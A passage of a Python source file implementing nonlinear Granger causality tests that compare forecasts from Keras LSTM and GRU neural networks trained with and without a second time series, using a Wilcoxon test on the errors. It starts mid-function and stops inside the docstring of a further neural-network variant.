raise TypeError('LSTM_layers should be a positive integer.')
if LSTM_layers<0:
raise ValueError('LSTM_layers sholud be a positive integer.')
# Checking if the number of LSTM neurons in each layer is correct
if type(LSTM_neurons) is list or type(LSTM_neurons) is np.ndarray or type(Dense_neurons) is tuple:
for LSTM_n in LSTM_neurons:
if type(LSTM_n) is not int:
raise TypeError('Every element in LSTM_neurons should be a positive integer.')
elif LSTM_n<=0:
raise ValueError('Every element in LSTM_neurons should be a positive integer.')
if len(np.shape(LSTM_neurons)) != 1:
raise Exception('LSTM_neurons should be one dimension array or list.')
elif len(LSTM_neurons) != LSTM_layers:
raise Exception('Number of elements in LSTM_neurons should be equal to value of LSTM_layers.')
else:
raise TypeError('LSTM_neurons should be list or numpy array.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking if the number of Dense layers is correct
if type(Dense_layers) is not int:
raise TypeError('Dense_layers should be a positive integer.')
if Dense_layers<0:
raise ValueError('Dense_layers sholud be a positive integer.')
# Checking if the number of Dense neurons in each layer is correct
elif type(Dense_neurons) is list or type(Dense_neurons) is np.ndarray or type(Dense_neurons) is tuple:
for Dense_n in Dense_neurons:
if type(Dense_n) is not int:
raise TypeError('Every element in Dense_neurons should be a positive integer.')
elif Dense_layers>0 and Dense_n<=0:
raise ValueError('Every element in Dense_neurons should be a positive integer.')
if len(np.shape(Dense_neurons)) != 1:
raise Exception('Dense_neurons should be one dimension array or list.')
elif len(Dense_neurons) != Dense_layers:
raise Exception('Number of elements in Dense_neurons should be equal to value of Dense_layers.')
else:
raise TypeError('Dense_neurons should be list or numpy array.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest has to many columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest = x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif z!=[] and ztest==[] and isxtest==False:
ztest=z
elif z!=[] and ztest==[] and isxtest==True:
raise Exception('ztest should be set if xtest is different than [].')
elif ztest!=[]:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if add_Dropout has correct type
if type(add_Dropout) is not bool:
raise TypeError('add_Dropout should be boolean.')
# Checking if Dropout_rate has correct type and value
if type(Dropout_rate) is not float:
raise TypeError('Dropout_rate should be float.')
else:
if Dropout_rate<0.0 or Dropout_rate>=1.0:
raise ValueError('Dropout_rate shold be greater than 0 and less than 1.')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or list of positibe integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is a int, then learning_rate also should be int or float not list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or list of positibe integers (or both).')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers (or both).')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
else:
learning_rate=[learning_rate]
if type(learning_rate) is list:
raise TypeError('If learning_rate is int or float, then epochs_num should be int not list.')
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int: # or not np.isnan(batch_size_num) :
raise TypeError('batch_size_num should be an integer or NaN.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
else:
verb = verbose
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating LSTM neural network models and testing for casuality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal, that will be forecasting
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if z!=[]:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if z!=[]:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test testing data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # creating Sequential model, which will use only data from X time series to forecast X.
historyX[r] = []
historyXY[r] = []
if LSTM_layers == 1: # If there is only one LSTM layer, than return_sequences should be false
modelX[r].add(LSTM(LSTM_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many LSTM layers return_sequences should be True, to conncect layers with each other
modelX[r].add(LSTM(LSTM_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for lstml in range(1,LSTM_layers): # adding next LSTM layers
if lstml == LSTM_layers-1:
modelX[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
else:
modelX[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelX[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
modelXY[r] = Sequential()# creating Sequential model, which will use data from X and Y time series to forecast X.
if LSTM_layers == 1: # If there is only one LSTM layer, than return_sequences should be false
modelXY[r].add(LSTM(LSTM_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many LSTM layers return_sequences should be True, to conncect layers with each other
modelXY[r].add(LSTM(LSTM_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for lstml in range(1,LSTM_layers): # adding next LSTM layers
if lstml == LSTM_layers-1:
modelXY[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
else:
modelXY[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelXY[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing for statistically smaller forecast error for the model, which include X and Y
# Wilcoxon Signed Rank Test test
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print("Statistics value =", S,"p-value =", p_value)
if plot:
XpredX = best_modelX.predict(dataXtest)
XYpredX = best_modelXY.predict(dataXYtest)
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY, RSSX,
RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from the best model based on X','errors from the best model based on X and Y'])
return results
#%% GRU
def nonlincausalityGRU(x, maxlag, GRU_layers, GRU_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False):
'''
This function is implementation of modified Granger causality test. Granger causality is using linear autoregression for testing causality.
In this function forecasting is made using GRU neural network.
Used model:
1st GRU layer -> (Droput) -> ... -> (1st Dense layer) -> (Dropout) -> ... -> Output Dense layer
*() - not obligatory
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
GRU_layers - int, number of GRU layers in the model.
GRU_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of GRU layers specified in GRU_layers. The First GRU layer has the number of neurons equal to the first element in GRU_neurns,
the second layer has the number of neurons equal to the second element in GRU_neurons and so on.
run - int, determines how many times a given neural network architecture will be trained to select the model that has found the best minimum of the cost function
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, than Dropout layer is added after each GRU and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary, where the number of used lags is keys. Each key stores a list, which contains test results, models for prediction of X fitted only on X time series,
models for prediction of X fitted on X and Y time series, history of fitting the first model, history of fitting the second model, RSS of models based only on X, RSS of models based on X and Y,
index of the best model based on X, index of the best model based on X and Y, errors from the best model based on X, errors from the best model based on X and Y
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if the number of GRU layers is correct
if type(GRU_layers) is not int:
raise TypeError('GRU_layers should be a positive integer.')
if GRU_layers<0:
raise ValueError('GRU_layers sholud be a positive integer.')
# Checking if the number of GRU neurons in each layer is correct
if type(GRU_neurons) is list or type(GRU_neurons) is np.ndarray or type(GRU_neurons) is tuple:
for GRU_n in GRU_neurons:
if type(GRU_n) is not int:
raise TypeError('Every element in GRU_neurons should be a positive integer.')
elif GRU_n<=0:
raise ValueError('Every element in GRU_neurons should be a positive integer.')
if len(np.shape(GRU_neurons)) != 1:
raise Exception('GRU_neurons should be one dimension array or list.')
elif len(GRU_neurons) != GRU_layers:
raise Exception('Number of elements in GRU_neurons should be equal to value of GRU_layers.')
else:
raise TypeError('GRU_neurons should be list or numpy array.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking if the number of Dense layers is correct
if type(Dense_layers) is not int:
raise TypeError('Dense_layers should be a positive integer.')
if Dense_layers<0:
raise ValueError('Dense_layers sholud be a positive integer.')
# Checking if the number of Dense neurons in each layer is correct
elif type(Dense_neurons) is list or type(Dense_neurons) is np.ndarray or type(GRU_neurons) is tuple:
for Dense_n in Dense_neurons:
if type(Dense_n) is not int:
raise TypeError('Every element in Dense_neurons should be a positive integer.')
elif Dense_layers>0 and Dense_n<=0:
raise ValueError('Every element in Dense_neurons should be a positive integer.')
if len(np.shape(Dense_neurons)) != 1:
raise Exception('Dense_neurons should be one dimension array or list.')
elif len(Dense_neurons) != Dense_layers:
raise Exception('Number of elements in Dense_neurons should be equal to value of Dense_layers.')
else:
raise TypeError('Dense_neurons should be list or numpy array.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] != 2:
raise Exception('xtest has wrong shape.')
if xtest.shape[1] !=2:
raise Exception('xtest has to many columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif z!=[] and ztest==[] and isxtest==False:
ztest=z
elif z!=[] and ztest==[] and isxtest==True:
raise Exception('ztest should have the same length as xtest.')
elif ztest != [] :
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if add_Dropout has correct type
if type(add_Dropout) is not bool:
raise TypeError('add_Dropout should be boolean.')
# Checking if Dropout_rate has correct type and value
if type(Dropout_rate) is not float:
raise TypeError('Dropout_rate should be float.')
else:
if Dropout_rate<0.0 or Dropout_rate>=1.0:
raise ValueError('Dropout_rate shold be greater than 0 and less than 1.')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or list of positibe integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is a int, then learning_rate also should be int or float not list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or list of positibe integers (or both).')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers (or both).')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
else:
learning_rate=[learning_rate]
if type(learning_rate) is list:
raise TypeError('If learning_rate is int or float, then epochs_num should be int not list.')
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int: # or not np.isnan(batch_size_num) :
raise TypeError('batch_size_num should be an integer or NaN.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating GRU neural network models and testing for casuality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal, that will be forecasting
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if z!=[]:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if z!=[]:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test testing data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # creating Sequential model, which will use only data from X time series to forecast X.
historyX[r] = []
historyXY[r] = []
if GRU_layers == 1: # If there is only one GRU layer, than return_sequences should be false
modelX[r].add(GRU(GRU_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many GRU layers return_sequences should be True, to conncect layers with each other
modelX[r].add(GRU(GRU_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for grul in range(1,GRU_layers): # adding next GRU layers
if grul == GRU_layers-1:
modelX[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
else:
modelX[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelX[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
modelXY[r] = Sequential()# creating Sequential model, which will use data from X and Y time series to forecast X.
if GRU_layers == 1: # If there is only one GRU layer, than return_sequences should be false
modelXY[r].add(GRU(GRU_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many GRU layers return_sequences should be True, to conncect layers with each other
modelXY[r].add(GRU(GRU_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for grul in range(1,GRU_layers): # adding next GRU layers
if grul == GRU_layers-1:
modelXY[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
else:
modelXY[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelXY[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing for statistically smaller forecast error for the model, which include X and Y
# Wilcoxon Signed Rank Test test
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print("Statistics value =", S,"p-value =", p_value)
if plot:
XpredX = best_modelX.predict(dataXtest)
XYpredX = best_modelXY.predict(dataXYtest)
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY,
RSSX, RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
#%% NN
def nonlincausalityNN(x, maxlag, NN_config, NN_neurons, run=1, xtest=[], z=[], ztest=[], epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose = True, plot = False):
'''
This function is implementation of modified Granger causality test. Granger causality is using linear autoregression for testing causality.
In this function forecasting is made using Neural Network.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
NN_config - list, tuple or numpy ndarray. Specified subsequent layers of the neural network. List should contain only 'd', 'l', 'g' or 'dr':
'd' - Dense layer
'l' - LSTM layer
'g' - GRU layer
'dr' - Dropout layer
NN_neurons - list, tuple or numpy ndarray, where the number of elements should be equal to the number of layers in NN_config. Each value corresponds to the number of neurons in layers for Danse, LSTM and GRU layer and the rate for Dropout layer.
